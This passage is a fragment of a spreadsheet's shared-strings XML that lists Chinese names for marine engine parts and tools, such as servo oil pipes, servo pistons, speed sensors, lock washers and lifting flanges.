        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>斯太利合金焊条</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四方传动的内六角螺钉</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四位三通</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四位三通电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服单元检查单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> X41</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服单元支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服电机装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服盖，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服活塞，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服活塞衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服活塞导销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服活塞法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服活塞机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服活塞总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服壳体安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服壳体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服气缸机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油备用泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油法兰，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油高压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油高压接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管定距块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管分段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管塞子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管位移</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油压衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高速报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度电子控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度动作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度和位置传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度设置单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>随动件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>随负荷润滑装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缩径块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缩径螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>索引图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧弹簧垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧球</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧装置底座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁死螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>台架和航海试验</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镗孔用档圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳手，外六角</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳手接头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特定备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊发运方式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊机型</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊螺纹公差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊设计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊运行用设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊运转工况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制刀具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制螺钉，凸圆头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制铆钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制试压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制园螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制园柱销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特制止动板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梯子托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升工具质量规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
